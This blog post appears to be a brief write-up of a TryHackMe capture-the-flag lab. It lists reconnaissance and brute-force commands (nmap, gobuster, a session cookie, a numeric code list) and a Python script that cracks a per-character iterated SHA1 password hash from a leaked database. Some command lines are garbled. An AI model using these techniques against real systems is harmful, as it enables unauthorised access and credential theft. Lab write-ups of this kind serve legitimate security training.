TryHackmMe Side Quest AOC 2025 - BreachBlocker Unlocker (hard level)

-





      Fourth Side Quest (BreachBlocker Unlocker) started by discovering the key through reverse engineering an HTA file from the Advent of Cyber Day 21 room and using it to remove the firewall on the target machine.






Let's start with command used :

root@ip-10-81-182-239:~# :~# seq -w 0 999999 > codes.txt
root@ip-10-81-182-239:~# :~# COOKIE='session=.eJxtj11rwkAQRf_LPIsPKX40IKjgQwttTRsUEQmzm4lZ3Oza2UlESv-7WlCK5vmeey73B7CWkpwYjUI5xMI1dUCh22VRgZn2OUEMq35qF5_J4G3RWyYNfa2Ok-f0ZTt8lUgG2H_fDpO9eqK5nhym32nx0USzEfzTNMSmMBd_gTZcB9Baf6A8y32FxgWI10AYhFjVzhkKXSkr2NzBdGbtH6uR2cs5pPFjrQMV2hK5Lbsp267XgdhhdXkdFBPqUlmvd8Qtot8TkGpzmQ.aUpUuw.lQbR5-wD3QPxVos09eGYYGnQyEU'
root@ip-10-81-182-239:~# :~# gobuster dir -u https://10.81.135.120:8443 -w /usr/share/wordlists/dirbus
'emeter/directory-list-2.3-medium.txt -x .txt, js,py, html, zip - k
pip3 install aiosmtpd

root@ip-10-81-182-239:~# :~# aiosmtpd -n -l 0.0.0.0:25 -c aiosmtpd.handlers.Debugging stdout
nmap -sC -sV -p- <IP>


Python scrypt :


# script by ChatGPT
#!/usr/bin/env python3
import sqlite3
import hashlib
import string

DB_PATH = "hopflix-874297.db"
TARGET_EMAIL = "sbreachblocker@easterbunnies.thm"  # change if needed

def hopper_hash(s: str) -> str:
    res = s
    for _ in range(1000):
        res = hashlib.sha1(res.encode()).hexdigest()
    return res

def build_lookup(charset: str) -> dict[str, str]:
    # hash -> character
    lookup = {}
    for ch in charset:
        lookup[hopper_hash(ch)] = ch
    return lookup

def main():
    # Likely enough: all printable ASCII except whitespace controls
    charset = "".join(chr(i) for i in range(32, 127))
    lookup = build_lookup(charset)

    con = sqlite3.connect(DB_PATH)
    cur = con.cursor()

    row = cur.execute("SELECT * FROM users WHERE email = ?", (TARGET_EMAIL,)).fetchone()
    if not row:
        raise SystemExit("Email not found in DB.")

    phash = row[2]  # matches rows[0][2] in main.py
    if len(phash) % 40 != 0:
        print(f"[!] Hash length {len(phash)} not divisible by 40; still trying chunking...")

    chunks = [phash[i:i+40] for i in range(0, len(phash), 40)]

    out = []
    unknown = 0
    for idx, chunk in enumerate(chunks):
        ch = lookup.get(chunk)
        if ch is None:
            out.append("?")
            unknown += 1
        else:
            out.append(ch)

    password = "".join(out)
    print("[+] Recovered password (best effort):", password)
    if unknown:
        print(f"[!] {unknown} characters unknown. Expand charset (e.g., unicode) if needed.")

if __name__ == "__main__":
    main()






 

Comments

Post a Comment

Popular posts from this blog

TryHackMe - Threat Hunting Simulator - Health Hazard

-
Image
  Scenario overview After months of juggling content calendars and caffeine-fueled brainstorming, co-founder Tom Whiskers finally carved out time to build the company’s first website. It was supposed to be simple: follow a tutorial, install a few packages, and bring the brand to life with lightweight JavaScript magic.   But between sleepless nights and copy-pasted code, Tom started feeling off. Not sick exactly, just off. The terminal scrolled with reassuring green text, the site loaded fine, and everything looked normal.   Then, a strange file appeared on the system. No one could say where it came from. It wasn’t part of the tutorial, didn’t match any known dependencies, and didn’t even run.   It just waited.   Scenario objectives Determine how a threat actor first gained a foothold on the system. Identify suspicious activity that may point to the initial compromise method. Investigate signs of malicious execution following the initial access. Analyse the logs ...
Read more

TryHackMe - Typo Snare Threat Hunter Simulator (medium level)

-
Image
  Threat Hunt Walkthrough The "Typo Snare" scenario on TryHackMe is a fantastic real-world simulation of a sophisticated, multi-stage attack. It starts with a simple mistake and escalates to a full domain compromise, culminating in ransomware. This post will walk you through the entire attack chain, phase by phase, showing you how to find each piece of evidence using Elastic KQL queries. Phase 1: Initial Access & Execution What Happened: The attack began when the user perry.parsons on workstation WKSTN-03 needed a 7-Zip tool. He googled it, clicked a typosquatted link ( 7zipp.org ), and downloaded a trojanized installer. This installer executed a PowerShell script ( 7z.ps1 ) directly from the attacker's server to establish the initial foothold. How to Find It: You are looking for a PowerShell process that was likely spawned by a browser and contains a command to download and execute a script ( iwr for Invoke-WebRequest and iex for Invoke-Expression ). KQL Query...
Read more

TryHackMe - Initial Access Pot | CTF | (hard level)

-
Image
  This is another challenge for the Blue Team, but the level here is hard. Once the machine starts, we will receive credentials that allow us to dig into the logs directly. By exploring the attacker’s footsteps, we will identify which pages of the web application they accessed. Additionally, we have full access to the backend code of the running application once we log in via SSH. So I am not running any directory fuzzing tool. All Details are in the video  Thank you for watching 
Read more